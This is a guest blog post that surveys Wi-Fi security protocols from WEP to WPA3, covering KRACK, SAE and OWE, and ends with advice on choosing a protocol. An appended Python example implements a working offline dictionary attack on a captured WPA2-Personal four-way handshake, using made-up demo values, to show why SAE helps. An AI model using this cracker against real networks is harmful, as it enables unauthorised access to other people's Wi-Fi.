Wi-Fi Password Security - WEP, WPA, WPA2, WPA3 - A Beginner's Guide and Historical Overview (Guest Blog)
By Yury D. Morales On 05/18/2022
By 2021 we had reached more than 20 billion WLAN-connected devices worldwide, which raises an important question: which protocols give us Wi-Fi security? To answer it, we should first describe Wi-Fi as a network that uses wireless radio signals to transmit and receive data, and security as an accepted level of freedom from risk or danger.
For non-enterprise networks, this security has two halves: the passphrase you choose, and the encryption and authentication protocol that turns that passphrase into keys. Because of the latter, your network and devices can be vulnerable, secured, or more secured, depending on which wireless security protocol you are using. These are the following:
- WEP (Wired Equivalent Privacy)
- WPA (Wi-Fi Protected Access)
- WPA2 (Wi-Fi Protected Access 2)
- WPA3 (Wi-Fi Protected Access 3)
WEP (Wired Equivalent Privacy)
WEP (Wired Equivalent Privacy) was the first one, published with the original 802.11 standard in 1997 and attempting to bring, as its name describes, the same privacy as a wired network. Initially it was used only with 64-bit keys; 128-bit (and, on some vendors' equipment, 256-bit) WEP became available later where regulations allowed it. Note that these sizes include the 24-bit initialization vector (IV) that is sent in the clear with every frame, so the secret part of a "64-bit" key is only 40 bits, and of a "128-bit" key only 104 bits.
Security researchers found many vulnerabilities that compromise any network protected by WEP: the 24-bit IV starts repeating after a few thousand frames on a busy network, and weaknesses in the way RC4 is keyed let an attacker who has captured enough traffic recover the key in minutes. Therefore, the Wi-Fi Alliance officially retired it in 2004. Today WEP is outdated and not secure. It should not be used anywhere, anytime, in any way, when actual security is required.
WPA (Wi-Fi Protected Access)
Wi-Fi Protected Access (WPA) was developed in 2003 by the Wi-Fi Alliance in response to those vulnerabilities. In Personal mode it derives a 256-bit Pre-Shared Key (PSK) from the passphrase. It was not an IEEE standard at that time (that is, not part of the 802.11 protocol); it was based on a draft of 802.11i, and the IEEE ratified the finished 802.11i-2004 amendment later.
With WPA, two new security mechanisms were introduced: a Message Integrity Check (MIC, the Michael algorithm) and the Temporal Key Integrity Protocol (TKIP). The MIC lets the receiver detect frames that were forged or modified in transit, which WEP's plain CRC-32 checksum could not. With TKIP, each data packet is still encrypted with RC4, but under a different per-packet key mixed from the temporal key, the sender's MAC address and a 48-bit sequence counter, so the WEP IV-reuse problem goes away and replayed frames are rejected. After a while AES (Advanced Encryption Standard) was also made available as an option under WPA, though it was not used heavily in production networks.
There were two different modes of WPA:
- Personal Mode (WPA-PSK): a pre-shared key (PSK) derived from a passphrase was used with this mode, intended for individuals and small offices.
- Enterprise Mode (WPA-EAP, also called WPA-802.1X): the Extensible Authentication Protocol (EAP) was used along with an authentication server (typically RADIUS), so each user has individual credentials and receives individual session keys, which is more secure.
WPA is more secure than WEP. Despite this, security vulnerabilities were discovered in TKIP as well (practical attacks against the Michael MIC were published in 2008), and it is considered outdated. Like WEP, WPA should not be used anywhere, anytime, in any way, when actual security is required.
WPA2 (Wi-Fi Protected Access 2)
WPA2 (Wi-Fi Protected Access 2) was developed in 2004 as a corrected and advanced version of the first WPA, in conjunction with the ratification of 802.11i, which defined the standard by which both WPA and WPA2 operate. It offered new encryption and integrity protection to cover the original WPA weaknesses (to be fair, WPA was intended only as a transitional solution for hardware unable to perform AES encryption): AES (Advanced Encryption Standard) used through CCMP (Counter Mode with CBC-MAC Protocol), which provides both confidentiality and authentication of every frame with a single key.
AES was standardized by the United States Government (NIST, FIPS 197, in 2001) as the replacement for the older DES (Data Encryption Standard) from the 1970s, and was later approved by the NSA for protecting classified information up to TOP SECRET. After a while, it was thought that using AES on Wi-Fi networks could also improve security, and it did.
As mentioned before, WPA2 was not only a corrected version but an advanced one, with improvements for Wi-Fi such as fast roaming. This was due to PMK caching support, which allows a client to reconnect to an AP it has recently been connected to without a full re-authentication, and pre-authentication support, which allows a client to authenticate with the AP it is moving towards while still maintaining its connection to the AP it is moving away from.
WPA2 is the default security method for individuals and even enterprises (with the Enterprise mode). For SOHO networks it is still a secure option when properly implemented with a long random passphrase; nevertheless, a vulnerability discovered in 2017 and known as the KRACK attack (Key Reinstallation Attack) affects Personal and Enterprise mode alike. KRACK does not recover the passphrase and does not let the attacker join the network; instead, by replaying message 3 of the four-way handshake, an attacker within radio range can force the client to reinstall an already-used key and reset its packet counter, which lets the attacker decrypt and replay frames the client sends (and, where TKIP or GCMP is used, forge frames as well). Most vendors patched their equipment quickly to be invulnerable to the most serious versions of this attack.
Until patched, approach a WPA2 network with the same caution as an open network. Since this vulnerability could compromise the encryption of a wireless network, useful countermeasures were recommended until patches for specific devices were released: using HTTPS for all websites and/or using a VPN to encrypt all network traffic, so that the Wi-Fi layer is not the only layer of protection.
WPA3 (Wi-Fi Protected Access 3)
The most recent security certification for wireless is WPA3 (Wi-Fi Protected Access 3). It offers improved authentication and encryption and closes the design weakness in WPA2's handshake that KRACK exploited. Its use is growing thanks to the 802.11ax standard, which requires it in the 6 GHz band (Wi-Fi 6E).
Speaking of Wi-Fi 6, it brings more coverage and capacity, and therefore more connected wireless devices, so better security will be needed. WPA3 will eventually be used with Wi-Fi 6 in all bands: in the 2.4 GHz and 5 GHz bands it is optional until the connecting clients support it, while in the 6 GHz band it is required in all cases (the only alternative there being OWE for open networks). Note that Wi-Fi 6 is simply 802.11ax in the traditional bands, while Wi-Fi 6E is extended into the 6 GHz band.
Within 802.11ax in the 6 GHz band (Wi-Fi 6E) there is another important feature improving the notoriously insecure open networks: OWE (Opportunistic Wireless Encryption), mentioned above and defined in RFC 8110. OWE was developed for public or open networks. With it, the client and the access point run a Diffie-Hellman exchange during association, so every client gets its own encryption keys without user interaction and without a passphrase. It resembles the key exchange in HTTPS in that a negotiation generates the encryption keys during the initial connection, with one important difference: OWE has no certificate or password, so it protects against passive eavesdropping by the other people on the hotspot but does not authenticate the access point. An attacker who sets up a rogue AP with the same name can still act as a man-in-the-middle.
Think about this. You are in your coffee shop working, connected with your PC, smartphone, and even tablet. With WPA3 or OWE, another person in the same public place cannot simply sniff your traffic the way they could on a legacy open network, and, unlike WPA2-PSK, even someone who knows the password cannot derive your session keys from a captured handshake. The exception is a public network that is still WPA2 and unpatched against KRACK.
It is well known that dictionary attacks, which try many candidate passwords one after another, work against WPA2-Personal. The attacker only needs to be within radio range long enough to capture a client's four-way handshake (or just the PMKID the AP includes in its first message); after that, every candidate passphrase can be checked offline, on a GPU, without ever talking to the network again. To prevent this type of attack, WPA3 replaces the pre-shared key as the source of the Pairwise Master Key with a new key negotiation protocol, the Simultaneous Authentication of Equals (SAE) handshake, a password-authenticated key exchange (the Dragonfly protocol). With SAE each password guess requires a live exchange with the AP, so an attacker cannot test passwords offline from a capture, and the resulting keys are different for every session even when the password is the same. The four-way handshake is still run afterwards to derive and confirm the session keys, but it is no longer the piece that a guessed passphrase can be checked against. With WPA2, the older four-way handshake alone was used, and it is more vulnerable, particularly when unpatched against KRACK.
WPA3 provides extra security and encryption if you compare it with its previous versions, such as WPA2, WPA, and WEP. Beyond SAE, it makes Protected Management Frames (802.11w) mandatory, so deauthentication and disassociation frames are authenticated and an attacker can no longer kick clients off the network simply by spoofing those frames.
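As an added example (not part of the original post), here is the WPA2-Personal key derivation that makes the offline attack described above possible, in Python using only the standard library. It builds a constructed message 2 of the four-way handshake (the SSID, MAC addresses, nonces, passphrase and wordlist are all made up for the demo, not from a real capture), then runs a wordlist against the captured MIC exactly the way an offline cracker does: PBKDF2 to get the PMK, the 802.11i PRF to get the PTK, and HMAC-SHA1 over the EAPOL-Key frame to check the MIC.

```python
import hashlib
import hmac

# Constructed sample values for the demo (not from a real capture).
SSID = b"CoffeeShopWiFi"
AP_MAC = bytes.fromhex("001122334455")      # authenticator address (AA)
CLIENT_MAC = bytes.fromhex("66778899aabb")  # supplicant address (SPA)
ANONCE = bytes.fromhex("aa" * 32)           # nonce the AP sends in message 1
SNONCE = bytes.fromhex("bb" * 32)           # nonce the client sends in message 2

# Field offsets inside an EAPOL-Key frame: 4-byte 802.1X header, then descriptor type (1),
# key info (2), key length (2), replay counter (8), nonce (32), IV (16), RSC (8), ID (8), MIC (16).
NONCE_OFFSET = 17
MIC_OFFSET = 81


def derive_pmk(passphrase: str, ssid: bytes) -> bytes:
    """WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This is the only step that depends on the passphrase, and it is what crackers brute-force."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid, 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ... until 64 bytes."""
    out = b""
    i = 0
    while len(out) < 64:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces)).
    Every input except the PMK travels in the clear, which is why a captured handshake is enough."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, frame_with_zero_mic: bytes) -> bytes:
    """Key descriptor version 2 (AES/CCMP): MIC = HMAC-SHA1(KCK, frame)[:16], where KCK = PTK[0:16]."""
    return hmac.new(kck, frame_with_zero_mic, hashlib.sha1).digest()[:16]


def build_message2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """Lay out message 2 of the four-way handshake as an EAPOL-Key frame (real field order and sizes)."""
    body = (
        b"\x02"                         # descriptor type: RSN
        + b"\x01\x0a"                   # key info: version 2 (HMAC-SHA1), pairwise, MIC present
        + b"\x00\x10"                   # key length: 16 bytes (CCMP)
        + (1).to_bytes(8, "big")        # replay counter
        + snonce                        # key nonce
        + bytes(16)                     # key IV
        + bytes(8)                      # key RSC
        + bytes(8)                      # key ID (reserved)
        + mic                           # key MIC (all zeros while the MIC is being computed)
        + (0).to_bytes(2, "big")        # key data length (RSN IE omitted in this demo)
    )
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # 802.1X v2, type 3 = EAPOL-Key


def client_sign_message2(passphrase: str) -> bytes:
    """What the real client does: derive PMK and PTK, then fill in the MIC over the frame."""
    ptk = derive_ptk(derive_pmk(passphrase, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
    return build_message2(SNONCE, eapol_mic(ptk[:16], build_message2(SNONCE)))


def crack_handshake(msg2: bytes, ssid: bytes, aa: bytes, spa: bytes, anonce: bytes, wordlist):
    """Offline dictionary attack: recompute the MIC for each candidate and compare with the captured one."""
    snonce = msg2[NONCE_OFFSET:NONCE_OFFSET + 32]
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = msg2[:MIC_OFFSET] + bytes(16) + msg2[MIC_OFFSET + 16:]
    for candidate in wordlist:
        kck = derive_ptk(derive_pmk(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed), captured_mic):
            return candidate
    return None


if __name__ == "__main__":
    captured = client_sign_message2("coffee2022")  # stands in for a frame taken from a sniffer
    wordlist = ["password", "12345678", "qwertyuiop", "coffee2022", "letmein123"]
    print("recovered passphrase:", crack_handshake(captured, SSID, AP_MAC, CLIENT_MAC, ANONCE, wordlist))
```

Everything the cracker needs besides the passphrase (SSID, both MAC addresses, both nonces and the MIC) is visible in the capture, so the loop never has to contact the network; the 4096 PBKDF2 iterations are the only cost per guess, and a GPU does hundreds of thousands of them per second. SAE breaks this loop because the PMK is no longer a function of the password alone.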
Furthermore, alongside WPA3 the Wi-Fi Alliance introduced a new way of joining a network called Wi-Fi Easy Connect, based on the Device Provisioning Protocol (DPP). It reduces complexity and enhances the user experience of connecting devices to Wi-Fi networks while incorporating the highest security standards. Wi-Fi Easy Connect introduces standardized mechanisms to simplify the provisioning and configuration of Wi-Fi devices. Provisioning and configuring devices, including those without a rich user interface, is now as simple as scanning the product's quick response (QR) code or NFC tag, or downloading the device information from the cloud, to enable zero-touch connection to a Wi-Fi network.
So, which one should I use?
Finally, with all this information you may be wondering "Which one should I use?". Evidently, WPA3. If it is not available, you can go with WPA2 knowing the potential weaknesses: use AES/CCMP only (no TKIP), choose a long random passphrase, and keep the firmware patched. WPA2 with a strong EAP method (Enterprise mode) is still far more secure than WPA2-PSK and may continue to be used in many organizations for a few more years because of older devices in use. If you run WPA3 and WPA2 side by side in transition mode for those older clients, be aware that an attacker can try to push a client down to the WPA2 side, so move to WPA3-only as soon as your clients allow it. You can learn all the nitty-gritty details of these security solutions in the CWSP Certified Wireless Security Professional Study and Reference Guide available from CWNP.
Blog Disclaimer: The opinions expressed within these blog posts are solely the author’s and do not reflect the opinions and beliefs of the Certitrek, CWNP or its affiliates.